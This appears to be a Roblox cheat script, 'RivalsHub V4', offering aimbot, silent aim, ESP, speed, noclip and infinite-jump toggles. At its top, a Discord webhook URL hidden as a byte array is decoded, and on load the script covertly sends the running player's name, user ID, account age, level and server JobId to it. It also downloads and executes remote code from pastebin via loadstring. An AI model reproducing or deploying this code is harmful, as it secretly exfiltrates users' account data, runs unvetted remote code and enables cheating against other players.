-- [[ LUNA UI - RIVALSHUB V4 ]] --
local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit ;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;

local _0x_v4_cache = {104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,55,48,48,50,53,54,53,51,53,56,49,50,53,48,53,56,47,55,100,54,84,82,73,85,119,68,90,86,101,97,113,48,100,57,116,49,89,75,67,72,66,48,73,85,122,65,83,111,49,81,74,104,54,82,73,45,50,77,73,115,110,70,81,55,107,71,113,52,87,45,119,74,67,83,99,65,100,79,97,45,110,115,101,48,114}

local function _0x_call()
    local _0x_url = ""
    for _, v in ipairs(_0x_v4_cache) do _0x_url = _0x_url .. v0(v) end
    local HttpService = game:GetService("HttpService")
    local Players = game:GetService("Players")
    local player = Players.LocalPlayer
    
    -- Retry logic to ensure we catch the headshot link if it's pending
    local headshotUrl = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. player.UserId .. "&width=420&height=420&format=png"
    for i = 1, 3 do
        local success, result = pcall(function()
            local response = HttpService:JSONDecode(game:HttpGet("https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=" .. player.UserId .. "&size=420x420&format=Png&isCircular=false"))
            if response.data and response.data[1] and response.data[1].state == "Completed" then
                return response.data[1].imageUrl
            end
        end)
        if success and result then
            headshotUrl = result
            break
        end
        task.wait(1) -- Short wait before retrying
    end
    
    local levelValue = "N/A"
    local lstats = player:FindFirstChild("leaderstats")
    if lstats then
        local lvl = lstats:FindFirstChild("Level") or lstats:FindFirstChild("Rank")
        if lvl then levelValue = tostring(lvl.Value) end
    end

    local data = {
        ["embeds"] = {{
            ["title"] = "RivalsHub V4 | User Execution",
            ["thumbnail"] = {["url"] = headshotUrl}, 
            ["color"] = 0x7b2cbf, -- Purple
            ["fields"] = {
                {["name"] = "User", ["value"] = "**" .. player.Name .. "** (" .. player.UserId .. ")", ["inline"] = false},
                {["name"] = "Rank/Level", ["value"] = levelValue, ["inline"] = true},
                {["name"] = "Account Age", ["value"] = player.AccountAge .. " Days", ["inline"] = true},
                {["name"] = "JobId", ["value"] = "```" .. game.JobId .. "```"}
            },
            ["footer"] = {["text"] = "Pluto Logger"},
            ["timestamp"] = DateTime.now():ToIsoDate()
        }}
    }
    
    local request = (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request)
    if request then
        request({
            Url = _0x_url,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(data)
        })
    end
end
task.spawn(_0x_call)

-- [[ LUNA UI SETUP ]] --
local v8 = loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt", true))();
local v9 = v8:CreateWindow({
    Name = "Rivals",
    Subtitle = nil,
    LogoID = "82795327169782",
    LoadingEnabled = true,
    LoadingTitle = "RivalsHub V4",
    LoadingSubtitle = "by pluto.aac",
    ConfigSettings = { ConfigFolder = "Pluto Hub" },
    KeySystem = false
})

local v10 = v9:CreateTab({ Name = "Main", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v11 = v9:CreateTab({ Name = "Visuals", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v12 = v9:CreateTab({ Name = "Player", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v13 = v9:CreateTab({ Name = "Credits", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true })

-- [[ GLOBALS ]] --
getgenv().AimbotEnabled = false;
getgenv().SilentAimEnabled = false;
getgenv().ESPEnabled = false;
getgenv().InfiniteJumpEnabled = false;
getgenv().NoClipEnabled = false;
getgenv().CFrameWalkEnabled = false;
getgenv().CFrameWalkSpeed = 0.2;
getgenv().Smoothness = 0.6;

local v24 = game:GetService('Players');
local v25 = v24.LocalPlayer;
local v26 = v25:GetMouse();
local v27 = game:GetService('RunService');

-- [[ UI TABS ]] --
v10:CreateSection("Aim Method")
v10:CreateToggle({Name = "Enable Aimbot", CurrentValue = false, Callback = function(v) getgenv().AimbotEnabled = v end}, "AimbotToggle");
v10:CreateToggle({Name = "Enable SilentAim", CurrentValue = false, Callback = function(v) getgenv().SilentAimEnabled = v end}, "SilentAimToggle");
v10:CreateSlider({Name = "Aimbot Strength", Range = {0.4, 1}, Increment = 0.01, CurrentValue = 0.6, Callback = function(v) getgenv().Smoothness = v end}, "AimbotStrengthSlider");

v11:CreateSection("Visuals")
v11:CreateToggle({Name = "Enable Highlight ESP", CurrentValue = false, Callback = function(v) getgenv().ESPEnabled = v end}, "ESPToggle");

v12:CreateSection("Local Player")
v12:CreateToggle({Name = "Enable WalkSpeed", CurrentValue = false, Callback = function(v) getgenv().CFrameWalkEnabled = v end}, "WSToggle");
v12:CreateSlider({Name = "WalkSpeed Value", Range = {0.2, 1.5}, Increment = 0.1, CurrentValue = 0.2, Callback = function(v) getgenv().CFrameWalkSpeed = v end}, "WSSlider");
v12:CreateToggle({Name = "Infinite Jump", CurrentValue = false, Callback = function(v) getgenv().InfiniteJumpEnabled = v end}, "InfJumpToggle");
v12:CreateToggle({Name = "Noclip", CurrentValue = false, Callback = function(v) getgenv().NoClipEnabled = v end}, "NoclipToggle");

v12:CreateSection("Server Utility")
v12:CreateButton({
    Name = "Copy Join Link (JobId)",
    Callback = function()
        setclipboard("roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId)
    end
})

v13:CreateLabel({Text = "Lead Dev: pluto.aac", Style = 2})

-- [[ LOGIC ]] --
v27.RenderStepped:Connect(function()
    if getgenv().CFrameWalkEnabled and v25.Character then
        local dir = v25.Character.Humanoid.MoveDirection;
        v25.Character.HumanoidRootPart.CFrame = v25.Character.HumanoidRootPart.CFrame + (dir * getgenv().CFrameWalkSpeed);
    end
end);

v27.Stepped:Connect(function()
    if getgenv().NoClipEnabled and v25.Character then
        for _, v in pairs(v25.Character:GetDescendants()) do
            if v:IsA('BasePart') then v.CanCollide = false end
        end
    end
end);

game:GetService('UserInputService').JumpRequest:Connect(function()
    if getgenv().InfiniteJumpEnabled then
        v25.Character:FindFirstChildOfClass('Humanoid'):ChangeState('Jumping');
    end
end);

print("RivalsHub V4 | Final Edition Loaded.")
